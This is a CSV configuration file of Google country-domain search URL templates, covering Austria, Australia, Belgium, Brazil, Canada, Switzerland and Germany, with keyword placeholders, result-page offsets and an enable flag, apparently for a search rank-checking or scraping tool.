"International","Google At 4 (Next 100)","http://www.google.at/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=300&sa=N","0"
"International","Google At 4 (Next 100)","http://www.google.at/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=300&sa=N","0"
"International","Google At 4 (Next 100)","http://www.google.at/search?q={SEARCH_KEYWORD}&num=100&hl=de&lr=&ie=UTF-8&oe=UTF-8&start=300&sa=N","0"
"International","Google At 4 (Next 100)","http://www.google.at/search?q={SEARCH_KEYWORD}&num=100&hl=de&lr=&ie=UTF-8&oe=UTF-8&start=300&sa=N","0"
"International","Google At 4 (Next 100)","http://www.google.at/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=300&sa=N","0"
"International","Google At 5 (Next 100)","http://www.google.at/search?q={SEARCH_KEYWORD}&num=100&hl=de&lr=&ie=UTF-8&oe=UTF-8&start=400&sa=N","1"
"International","Google At 5 (Next 100)","http://www.google.at/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=400&sa=N","0"
"International","Google At 5 (Next 100)","http://www.google.at/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=400&sa=N","0"
"International","Google At 5 (Next 100)","http://www.google.at/search?q={SEARCH_KEYWORD}&num=100&hl=de&lr=&ie=UTF-8&oe=UTF-8&start=400&sa=N","0"
"International","Google At 5 (Next 100)","http://www.google.at/search?q={SEARCH_KEYWORD}&num=100&hl=de&lr=&ie=UTF-8&oe=UTF-8&start=400&sa=N","0"
"International","Google At 5 (Next 100)","http://www.google.at/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=400&sa=N","0"
"International","Google Au","http://www.google.com.au/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=0&sa=N","1"
"International","Google Au","http://www.google.com.au/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=0&sa=N","0"
"International","Google Au","http://www.google.com.au/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=0&sa=N","0"
"International","Google AU","http://www.google.com.au/search?q={SEARCH_KEYWORD}&ie=UTF-8&oe=UTF-8&hl=en&meta=","1"
"International","Google AU","http://www.google.com.au/search?q={SEARCH_KEYWORD}&ie=UTF-8&oe=UTF-8&hl=en&meta=","0"
"International","Google AU","http://www.google.com.au/search?q={SEARCH_KEYWORD}&ie=UTF-8&oe=UTF-8&hl=en&meta=","0"
"International","Google Au 2 (Next 100)","http://www.google.com.au/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=100&sa=N","1"
"International","Google Au 2 (Next 100)","http://www.google.com.au/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=100&sa=N","0"
"International","Google Au 2 (Next 100)","http://www.google.com.au/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=100&sa=N","0"
"International","Google AU 2 (Next 100)","http://www.google.com.au/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&start=100&sa=N","1"
"International","Google AU 2 (Next 100)","http://www.google.com.au/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&start=100&sa=N","0"
"International","Google AU 2 (Next 100)","http://www.google.com.au/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&start=100&sa=N","0"
"International","Google Au 3 (Next 100)","http://www.google.com.au/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=200&sa=N","1"
"International","Google Au 3 (Next 100)","http://www.google.com.au/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=200&sa=N","0"
"International","Google Au 3 (Next 100)","http://www.google.com.au/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=200&sa=N","0"
"International","Google AU 3 (Next 100)","http://www.google.com.au/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&start=200&sa=N","1"
"International","Google AU 3 (Next 100)","http://www.google.com.au/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&start=200&sa=N","0"
"International","Google AU 3 (Next 100)","http://www.google.com.au/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&start=200&sa=N","1"
"International","Google Au 4 (Next 100)","http://www.google.com.au/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=300&sa=N","0"
"International","Google Au 4 (Next 100)","http://www.google.com.au/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=300&sa=N","0"
"International","Google Au 4 (Next 100)","http://www.google.com.au/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=300&sa=N","0"
"International","Google AU 4 (Next 100)","http://www.google.com.au/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&start=300&sa=N","1"
"International","Google AU 4 (Next 100)","http://www.google.com.au/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&start=300&sa=N","0"
"International","Google AU 4 (Next 100)","http://www.google.com.au/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&start=300&sa=N","1"
"International","Google Au 5 (Next 100)","http://www.google.com.au/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=400&sa=N","0"
"International","Google Au 5 (Next 100)","http://www.google.com.au/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=400&sa=N","0"
"International","Google Au 5 (Next 100)","http://www.google.com.au/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=400&sa=N","0"
"International","Google AU 5 (Next 100)","http://www.google.com.au/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&start=400&sa=N","1"
"International","Google AU 5 (Next 100)","http://www.google.com.au/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&start=400&sa=N","0"
"International","Google AU 5 (Next 100)","http://www.google.com.au/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&start=400&sa=N","0"
"International","Google Be","http://www.google.be/search?q={SEARCH_KEYWORD}&ie=UTF-8&oe=UTF-8&hl=en&meta=","1"
"International","Google Be","http://www.google.be/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=0&sa=N","0"
"International","Google Be","http://www.google.be/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=0&sa=N","0"
"International","Google Be","http://www.google.be/search?q={SEARCH_KEYWORD}&ie=UTF-8&oe=UTF-8&hl=en&meta=","0"
"International","Google Be","http://www.google.be/search?q={SEARCH_KEYWORD}&ie=UTF-8&oe=UTF-8&hl=en&meta=","0"
"International","Google Be","http://www.google.be/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=0&sa=N","0"
"International","Google Be 2 (Next 100)","http://www.google.be/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&start=100&sa=N","1"
"International","Google Be 2 (Next 100)","http://www.google.be/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=100&sa=N","0"
"International","Google Be 2 (Next 100)","http://www.google.be/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=100&sa=N","0"
"International","Google Be 2 (Next 100)","http://www.google.be/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&start=100&sa=N","0"
"International","Google Be 2 (Next 100)","http://www.google.be/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&start=100&sa=N","0"
"International","Google Be 2 (Next 100)","http://www.google.be/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=100&sa=N","0"
"International","Google Be 3 (Next 100)","http://www.google.be/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&start=200&sa=N","1"
"International","Google Be 3 (Next 100)","http://www.google.be/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=200&sa=N","0"
"International","Google Be 3 (Next 100)","http://www.google.be/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=200&sa=N","0"
"International","Google Be 3 (Next 100)","http://www.google.be/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&start=200&sa=N","0"
"International","Google Be 3 (Next 100)","http://www.google.be/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&start=200&sa=N","0"
"International","Google Be 3 (Next 100)","http://www.google.be/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=200&sa=N","0"
"International","Google Be 4 (Next 100)","http://www.google.be/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&start=300&sa=N","1"
"International","Google Be 4 (Next 100)","http://www.google.be/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=300&sa=N","0"
"International","Google Be 4 (Next 100)","http://www.google.be/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=300&sa=N","0"
"International","Google Be 4 (Next 100)","http://www.google.be/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&start=300&sa=N","0"
"International","Google Be 4 (Next 100)","http://www.google.be/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&start=300&sa=N","0"
"International","Google Be 4 (Next 100)","http://www.google.be/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=300&sa=N","0"
"International","Google Be 5 (Next 100)","http://www.google.be/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&start=400&sa=N","1"
"International","Google Be 5 (Next 100)","http://www.google.be/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=400&sa=N","0"
"International","Google Be 5 (Next 100)","http://www.google.be/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=400&sa=N","0"
"International","Google Be 5 (Next 100)","http://www.google.be/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&start=400&sa=N","0"
"International","Google Be 5 (Next 100)","http://www.google.be/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&start=400&sa=N","0"
"International","Google Be 5 (Next 100)","http://www.google.be/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=400&sa=N","0"
"International","Google Br","http://www.google.com.br/search?q={SEARCH_KEYWORD}&num=100&hl=pt-BR&lr=&ie=UTF-8&oe=UTF-8&start=0&sa=N","1"
"International","Google Br","http://www.google.com.br/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=0&sa=N","0"
"International","Google Br","http://www.google.com.br/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=0&sa=N","0"
"International","Google Br","http://www.google.com.br/search?q={SEARCH_KEYWORD}&num=100&hl=pt-BR&lr=&ie=UTF-8&oe=UTF-8&start=0&sa=N","0"
"International","Google Br","http://www.google.com.br/search?q={SEARCH_KEYWORD}&num=100&hl=pt-BR&lr=&ie=UTF-8&oe=UTF-8&start=0&sa=N","0"
"International","Google Br","http://www.google.com.br/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=0&sa=N","0"
"International","Google Br 2 (Next 100)","http://www.google.com.br/search?q={SEARCH_KEYWORD}&num=100&hl=pt-BR&lr=&ie=UTF-8&oe=UTF-8&start=100&sa=N","1"
"International","Google Br 2 (Next 100)","http://www.google.com.br/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=100&sa=N","0"
"International","Google Br 2 (Next 100)","http://www.google.com.br/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=100&sa=N","0"
"International","Google Br 2 (Next 100)","http://www.google.com.br/search?q={SEARCH_KEYWORD}&num=100&hl=pt-BR&lr=&ie=UTF-8&oe=UTF-8&start=100&sa=N","0"
"International","Google Br 2 (Next 100)","http://www.google.com.br/search?q={SEARCH_KEYWORD}&num=100&hl=pt-BR&lr=&ie=UTF-8&oe=UTF-8&start=100&sa=N","0"
"International","Google Br 2 (Next 100)","http://www.google.com.br/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=100&sa=N","0"
"International","Google Br 3 (Next 100)","http://www.google.com.br/search?q={SEARCH_KEYWORD}&num=100&hl=pt-BR&lr=&ie=UTF-8&oe=UTF-8&start=200&sa=N","1"
"International","Google Br 3 (Next 100)","http://www.google.com.br/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=200&sa=N","0"
"International","Google Br 3 (Next 100)","http://www.google.com.br/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=200&sa=N","0"
"International","Google Br 3 (Next 100)","http://www.google.com.br/search?q={SEARCH_KEYWORD}&num=100&hl=pt-BR&lr=&ie=UTF-8&oe=UTF-8&start=200&sa=N","0"
"International","Google Br 3 (Next 100)","http://www.google.com.br/search?q={SEARCH_KEYWORD}&num=100&hl=pt-BR&lr=&ie=UTF-8&oe=UTF-8&start=200&sa=N","0"
"International","Google Br 3 (Next 100)","http://www.google.com.br/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=200&sa=N","0"
"International","Google Br 4 (Next 100)","http://www.google.com.br/search?q={SEARCH_KEYWORD}&num=100&hl=pt-BR&lr=&ie=UTF-8&oe=UTF-8&start=300&sa=N","1"
"International","Google Br 4 (Next 100)","http://www.google.com.br/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=300&sa=N","0"
"International","Google Br 4 (Next 100)","http://www.google.com.br/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=300&sa=N","0"
"International","Google Br 4 (Next 100)","http://www.google.com.br/search?q={SEARCH_KEYWORD}&num=100&hl=pt-BR&lr=&ie=UTF-8&oe=UTF-8&start=300&sa=N","0"
"International","Google Br 4 (Next 100)","http://www.google.com.br/search?q={SEARCH_KEYWORD}&num=100&hl=pt-BR&lr=&ie=UTF-8&oe=UTF-8&start=300&sa=N","0"
"International","Google Br 4 (Next 100)","http://www.google.com.br/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=300&sa=N","0"
"International","Google Br 5 (Next 100)","http://www.google.com.br/search?q={SEARCH_KEYWORD}&num=100&hl=pt-BR&lr=&ie=UTF-8&oe=UTF-8&start=400&sa=N","1"
"International","Google Br 5 (Next 100)","http://www.google.com.br/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=400&sa=N","0"
"International","Google Br 5 (Next 100)","http://www.google.com.br/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=400&sa=N","0"
"International","Google Br 5 (Next 100)","http://www.google.com.br/search?q={SEARCH_KEYWORD}&num=100&hl=pt-BR&lr=&ie=UTF-8&oe=UTF-8&start=400&sa=N","0"
"International","Google Br 5 (Next 100)","http://www.google.com.br/search?q={SEARCH_KEYWORD}&num=100&hl=pt-BR&lr=&ie=UTF-8&oe=UTF-8&start=400&sa=N","0"
"International","Google Br 5 (Next 100)","http://www.google.com.br/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=400&sa=N","0"
"International","Google CA","http://www.google.ca/search?num=100&hl=en&q={SEARCH_KEYWORD}&meta=cr%3DcountryCA","1"
"International","Google CA","http://www.google.ca/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=0&sa=N","0"
"International","Google CA","http://www.google.ca/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=0&sa=N","0"
"International","Google CA","http://www.google.ca/search?num=100&hl=en&q={SEARCH_KEYWORD}&meta=cr%3DcountryCA","0"
"International","Google CA","http://www.google.ca/search?num=100&hl=en&q={SEARCH_KEYWORD}&meta=cr%3DcountryCA","0"
"International","Google CA","http://www.google.ca/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=0&sa=N","0"
"International","Google CA 2 (Next 100)","http://www.google.ca/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&cr=countryCA&ie=UTF-8&start=100&sa=N","1"
"International","Google CA 2 (Next 100)","http://www.google.ca/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=100&sa=N","0"
"International","Google CA 2 (Next 100)","http://www.google.ca/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=100&sa=N","0"
"International","Google CA 2 (Next 100)","http://www.google.ca/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&cr=countryCA&ie=UTF-8&start=100&sa=N","0"
"International","Google CA 2 (Next 100)","http://www.google.ca/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&cr=countryCA&ie=UTF-8&start=100&sa=N","0"
"International","Google CA 2 (Next 100)","http://www.google.ca/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=100&sa=N","0"
"International","Google CA 3 (Next 100)","http://www.google.ca/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&cr=countryCA&ie=UTF-8&start=200&sa=N","1"
"International","Google CA 3 (Next 100)","http://www.google.ca/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=200&sa=N","0"
"International","Google CA 3 (Next 100)","http://www.google.ca/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=200&sa=N","0"
"International","Google CA 3 (Next 100)","http://www.google.ca/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&cr=countryCA&ie=UTF-8&start=200&sa=N","0"
"International","Google CA 3 (Next 100)","http://www.google.ca/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&cr=countryCA&ie=UTF-8&start=200&sa=N","0"
"International","Google CA 3 (Next 100)","http://www.google.ca/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=200&sa=N","0"
"International","Google CA 4 (Next 100)","http://www.google.ca/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&cr=countryCA&ie=UTF-8&start=300&sa=N","1"
"International","Google CA 4 (Next 100)","http://www.google.ca/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=300&sa=N","0"
"International","Google CA 4 (Next 100)","http://www.google.ca/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=300&sa=N","0"
"International","Google CA 4 (Next 100)","http://www.google.ca/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&cr=countryCA&ie=UTF-8&start=300&sa=N","0"
"International","Google CA 4 (Next 100)","http://www.google.ca/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&cr=countryCA&ie=UTF-8&start=300&sa=N","0"
"International","Google CA 4 (Next 100)","http://www.google.ca/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=300&sa=N","0"
"International","Google CA 5 (Next 100)","http://www.google.ca/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&cr=countryCA&ie=UTF-8&start=400&sa=N","1"
"International","Google CA 5 (Next 100)","http://www.google.ca/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=400&sa=N","0"
"International","Google CA 5 (Next 100)","http://www.google.ca/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=400&sa=N","0"
"International","Google CA 5 (Next 100)","http://www.google.ca/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&cr=countryCA&ie=UTF-8&start=400&sa=N","0"
"International","Google CA 5 (Next 100)","http://www.google.ca/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&cr=countryCA&ie=UTF-8&start=400&sa=N","0"
"International","Google CA 5 (Next 100)","http://www.google.ca/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=400&sa=N","0"
"International","Google CH","http://www.google.ch/search?num=100&q={SEARCH_KEYWORD}&hl=de&btnG=Google+Suche&meta=cr%3DcountryCH","1"
"International","Google CH","http://www.google.ch/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=0&sa=N","0"
"International","Google CH","http://www.google.ch/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=0&sa=N","0"
"International","Google CH","http://www.google.ch/search?num=100&q={SEARCH_KEYWORD}&hl=de&btnG=Google+Suche&meta=cr%3DcountryCH","0"
"International","Google CH","http://www.google.ch/search?num=100&q={SEARCH_KEYWORD}&hl=de&btnG=Google+Suche&meta=cr%3DcountryCH","0"
"International","Google CH","http://www.google.ch/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=0&sa=N","0"
"International","Google CH 2 (Next 100)","http://www.google.ch/search?q={SEARCH_KEYWORD}&num=100&hl=de&lr=&cr=countryCH&ie=UTF-8&start=100&sa=N","1"
"International","Google CH 2 (Next 100)","http://www.google.ch/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=100&sa=N","0"
"International","Google CH 2 (Next 100)","http://www.google.ch/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=100&sa=N","0"
"International","Google CH 2 (Next 100)","http://www.google.ch/search?q={SEARCH_KEYWORD}&num=100&hl=de&lr=&cr=countryCH&ie=UTF-8&start=100&sa=N","0"
"International","Google CH 2 (Next 100)","http://www.google.ch/search?q={SEARCH_KEYWORD}&num=100&hl=de&lr=&cr=countryCH&ie=UTF-8&start=100&sa=N","0"
"International","Google CH 2 (Next 100)","http://www.google.ch/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=100&sa=N","0"
"International","Google CH 3 (Next 100)","http://www.google.ch/search?q={SEARCH_KEYWORD}&num=100&hl=de&lr=&cr=countryCH&ie=UTF-8&start=200&sa=N","1"
"International","Google CH 3 (Next 100)","http://www.google.ch/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=200&sa=N","0"
"International","Google CH 3 (Next 100)","http://www.google.ch/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=200&sa=N","0"
"International","Google CH 3 (Next 100)","http://www.google.ch/search?q={SEARCH_KEYWORD}&num=100&hl=de&lr=&cr=countryCH&ie=UTF-8&start=200&sa=N","0"
"International","Google CH 3 (Next 100)","http://www.google.ch/search?q={SEARCH_KEYWORD}&num=100&hl=de&lr=&cr=countryCH&ie=UTF-8&start=200&sa=N","0"
"International","Google CH 3 (Next 100)","http://www.google.ch/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=200&sa=N","0"
"International","Google CH 4 (Next 100)","http://www.google.ch/search?q={SEARCH_KEYWORD}&num=100&hl=de&lr=&cr=countryCH&ie=UTF-8&start=300&sa=N","1"
"International","Google CH 4 (Next 100)","http://www.google.ch/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=300&sa=N","0"
"International","Google CH 4 (Next 100)","http://www.google.ch/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=300&sa=N","0"
"International","Google CH 4 (Next 100)","http://www.google.ch/search?q={SEARCH_KEYWORD}&num=100&hl=de&lr=&cr=countryCH&ie=UTF-8&start=300&sa=N","0"
"International","Google CH 4 (Next 100)","http://www.google.ch/search?q={SEARCH_KEYWORD}&num=100&hl=de&lr=&cr=countryCH&ie=UTF-8&start=300&sa=N","0"
"International","Google CH 4 (Next 100)","http://www.google.ch/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=300&sa=N","0"
"International","Google CH 5 (Next 100)","http://www.google.ch/search?q={SEARCH_KEYWORD}&num=100&hl=de&lr=&cr=countryCH&ie=UTF-8&start=400&sa=N","1"
"International","Google CH 5 (Next 100)","http://www.google.ch/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=400&sa=N","0"
"International","Google CH 5 (Next 100)","http://www.google.ch/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=400&sa=N","0"
"International","Google CH 5 (Next 100)","http://www.google.ch/search?q={SEARCH_KEYWORD}&num=100&hl=de&lr=&cr=countryCH&ie=UTF-8&start=400&sa=N","0"
"International","Google CH 5 (Next 100)","http://www.google.ch/search?q={SEARCH_KEYWORD}&num=100&hl=de&lr=&cr=countryCH&ie=UTF-8&start=400&sa=N","0"
"International","Google CH 5 (Next 100)","http://www.google.ch/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=400&sa=N","0"
"International","Google DE","http://www.google.de/search?num=100&hl=de&q={SEARCH_KEYWORD}&btnG=Google+Suche&meta=cr%3DcountryDE","1"
"International","Google DE","http://www.google.de/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=0&sa=N","0"
"International","Google DE","http://www.google.de/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=0&sa=N","0"
"International","Google DE","http://www.google.de/search?num=100&hl=de&q={SEARCH_KEYWORD}&btnG=Google+Suche&meta=cr%3DcountryDE","0"
"International","Google DE","http://www.google.de/search?num=100&hl=de&q={SEARCH_KEYWORD}&btnG=Google+Suche&meta=cr%3DcountryDE","0"
"International","Google DE","http://www.google.de/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=0&sa=N","0"
"International","Google DE 2 (Next 100)","http://www.google.de/search?q={SEARCH_KEYWORD}&num=100&hl=de&lr=&cr=countryDE&ie=UTF-8&start=100&sa=N","1"
"International","Google DE 2 (Next 100)","http://www.google.de/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=100&sa=N","0"
"International","Google DE 2 (Next 100)","http://www.google.de/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=100&sa=N","0"
"International","Google DE 2 (Next 100)","http://www.google.de/search?q={SEARCH_KEYWORD}&num=100&hl=de&lr=&cr=countryDE&ie=UTF-8&start=100&sa=N","0"
"International","Google DE 2 (Next 100)","http://www.google.de/search?q={SEARCH_KEYWORD}&num=100&hl=de&lr=&cr=countryDE&ie=UTF-8&start=100&sa=N","0"
"International","Google DE 2 (Next 100)","http://www.google.de/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=100&sa=N","0"
"International","Google DE 3 (Next 100)","http://www.google.de/search?q={SEARCH_KEYWORD}&num=100&hl=de&lr=&cr=countryDE&ie=UTF-8&start=200&sa=N","1"
"International","Google DE 3 (Next 100)","http://www.google.de/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=200&sa=N","0"
"International","Google DE 3 (Next 100)","http://www.google.de/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=200&sa=N","0"
"International","Google DE 3 (Next 100)","http://www.google.de/search?q={SEARCH_KEYWORD}&num=100&hl=de&lr=&cr=countryDE&ie=UTF-8&start=200&sa=N","0"
"International","Google DE 3 (Next 100)","http://www.google.de/search?q={SEARCH_KEYWORD}&num=100&hl=de&lr=&cr=countryDE&ie=UTF-8&start=200&sa=N","0"
"International","Google DE 3 (Next 100)","http://www.google.de/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=200&sa=N","0"
"International","Google DE 4 (Next 100)","http://www.google.de/search?q={SEARCH_KEYWORD}&num=100&hl=de&lr=&cr=countryDE&ie=UTF-8&start=300&sa=N","1"
"International","Google DE 4 (Next 100)","http://www.google.de/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=300&sa=N","0"
"International","Google DE 4 (Next 100)","http://www.google.de/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=300&sa=N","0"
"International","Google DE 4 (Next 100)","http://www.google.de/search?q={SEARCH_KEYWORD}&num=100&hl=de&lr=&cr=countryDE&ie=UTF-8&start=300&sa=N","0"
"International","Google DE 4 (Next 100)","http://www.google.de/search?q={SEARCH_KEYWORD}&num=100&hl=de&lr=&cr=countryDE&ie=UTF-8&start=300&sa=N","0"
"International","Google DE 4 (Next 100)","http://www.google.de/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=300&sa=N","0"
"International","Google DE 5 (Next 100)","http://www.google.de/search?q={SEARCH_KEYWORD}&num=100&hl=de&lr=&cr=countryDE&ie=UTF-8&start=400&sa=N","1"
"International","Google DE 5 (Next 100)","http://www.google.de/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=400&sa=N","0"
